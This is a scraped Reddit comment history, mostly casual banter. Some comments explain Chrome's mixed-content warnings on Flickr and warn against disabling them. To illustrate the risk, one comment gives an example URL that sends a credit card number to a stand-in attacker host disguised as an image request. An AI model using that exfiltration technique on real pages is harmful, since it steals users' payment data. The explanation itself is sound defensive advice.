if($value[$i-1] >= 0 ? $value2 != $value[$i-1] : $value2)

saksida · 2012-05-26T04:08:49.299777+00:00

http://i2.kym-cdn.com/entries/icons/original/000/009/832/dafuq-did-i-just-read-meme.jpg

fotc77 · 1 day

Please re-read everything that has been posted, this is serious stuff and not worth the risk. Google uses the phrase "Although not recommended.." because they literally, don't recommend it. That feature is MOSTLY aimed for developers stuck in isolated testing environments. Do you think this feature would be turned off in a high-security setting like the cia or fbi? Don't answer that...

fotc77 · 1 day

Chrome is telling you there is a problem because there, well, IS a problem. A problem with Flickr.

Check for yourself.. goto http://www.whynopadlock.com and put in the url: https://secure.flickr.com/

You'll notice that 12 of 37 items are insecure.

I have developed many web solutions that use both HTTP and HTTPS (example, you switch to HTTPS when logged in), neither of which are subject to this issue. The reason? I detect if you are in fact using HTTPS and adjust my content to use it as well. It's really not hard. Basically, Yahoo! needs to add an if statement somewhere that changes a variable from http:// to https://

Example (from Google Analytics):

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-XXXXXXXX-1']);
_gaq.push(['_trackPageview']);
(function() {
  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

Look closely at this bolded part:

ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

They check to see if it's an HTTPS request, and then set their base to the appropriate protocol, and in this case also a sub-domain.

Security standards are getting more and more demanding so it doesn't surprise me that Chrome would be the first to start being more strict about them.

There is also another problem with turning off the secure checks: while you are technically "fixing" the annoyance, you are now also opening the door to other websites to be able to bypass the restriction. I'm sure a lot of you view random sites, look at porn, and visit torrent sites.. all of which have been incubators for viruses and malware.

fotc77 · 2 days

I really hope you aren't suggesting someone who's using the most secure browser on the planet to use: --allow-running-insecure-content

I am a web developer of 12 years, I strongly discourage this suggestion and recommend you just get used to clicking the allow button. Secondly, inform Flickr their site is acting up in Chrome. I'm sure they will get it fixed.. they only have ~50 million registered users...

fotc77 · 2 days

No. Here's why:

An insecure page (aka, anything HTTP) can load in both insecure and secure content. From HTTP or HTTPS.

A secure page (aka, anything HTTPS) can only load in secure content.

You might wonder, why?

When you make a call to a site, lets say http://example.com/image.jpg you are making a simple connection to a webserver, in this case example.com, and requesting /image.jpg (via a GET request).

So, why is this bad?

Using technologies like mod_rewite for the Apache Webserver allows me to redirect "pretty urls" to scripts. And yes, it could match against any kind of file.

Now lets assume the page you're on gets breached and the hacker wants to forward your CC to his website. Because the page is HTTPS, it cant connect to HTTP without you allowing it. Once you allow it, the attacker takes a variable containing lets say your credit card number, and appends this to a simple .jpg request.

Something like: http://example.com/image.jpg?creditcardnumber=5454545454545454

Now, on the hackers server, image.jpg is ACTUALLY a script that logs the submitted data to a DB and kicks out a static image to hide itself.

It's just too risky to ignore it. IE6 did and I'm pretty sure M$ is still kicking themselves in the ass for it...

Edit: I also forgot to mention that the main difference between HTTP and HTTPS is that all HTTPS traffic is encrypted before sending, and the server's identities are also verified.

fotc77 · 2 days

Unfortunately it's not a bug.

The page is being loaded over HTTPS which means EVERYTHING on the page must also be pulled over HTTPS. WhyNoPadlock shows that there are a TON of images (including the logo) that are being pulled over standard HTTP.

Also, I'm not sure you will find an extension that will allow this behavior because it could be used by the wrong hands.

Check it yourself: http://www.whynopadlock.com/ (type in: https://secure.flickr.com/)

norelevantcomments · 2 days

http://cdn.memegenerator.net/instances/400x/20921246.jpg

Emperor_Tamarin · 2 days

You're doing God's work, have an upvote

JimboRSA · 3 days

I had to make this, sorry

VapeVictim · 5 days

Smartphone flashlight.. GO!

I_love_aminals · 7 days

I saw it too, I love the idea :)

greenekid · 8 days

Awesome, you will have a ton of fun!

If you are looking to make friends you can jump on my server MegaBuilds.com later on, we also have teamspeak :)

zeb1 · 8 days

trollolol

davvik · 9 days

Jelly?

foreverk · 9 days

Meanwhile, the passenger keeps putting on makeup.. zero fucks given

NomNuggetNom · 9 days

Because you touch yourself at night...

axilious · 9 days

One day my mom was telling someone at work about some shoes she had gotten. When asked where she got them, she replied "Targé"

Apparently they spent the better part of that day trying to find it in town with no luck.. lol

Snakesballz · 10 days

YES!! You win all my upvotes :)

Snakesballz · 10 days

Exactly, I deeply miss some of my pets and reminisce about playing as a kid with them all the time, but I have to move on, and anytime I've heard/seen a pet death I just think to myself of all the good times and get back to it. I'm sure when my parents die I will be a mess and take off some time, but not over my dogs/cats...

Snakesballz · 10 days

Actually, my logic makes perfect sense. I'm sorry you lost your childhood pet, I've lot several. You can't let it affect your life or guess what... you're gonna lose! And the back story of my friend is that he is constantly taking days off at work saying he's sick when he obviously isn't, and the fact that a couple personal days was used for his cat was almost the last straw. Companies can't afford to lose money or be liable for things when the root of the problem is a house cat. I don't think that makes my boss the bitch, I think it makes my friend the bitch.

Snakesballz · 11 days

LOL, I suppose there will always be special cases..

FlyingRabidUnicornPi · 11 days

Damned if you do, damned if you don't, I suppose...

Snakesballz · 11 days

It seems your argument is more caught up on the animal-rights part of it, and not so much the "it's just a cat" side of it. Nobody here was saying, "kill cats because they aren't human", we're just saying if news about the death of your cat puts your life into a spiral, damn.

Example: I have a friend who almost lost his job because he took several days off to grief over his cat's untimely death. It was completely ridiculous, like if he had lost a close family member or something...

That being said, I propose this question:

Lets say someone with a gun is threatening to kill either your cat or your mother, and you have to choose which one lives. If you don't choose it will be your mother. Negotiations aren't an option. Discuss...

da404lewzer

TROPHY CASE

Five-Year Club	reddit gold Since May 2011
Verified Email

da404lewzer

TROPHY CASE

you'll need to login or register to do that

create a new account

login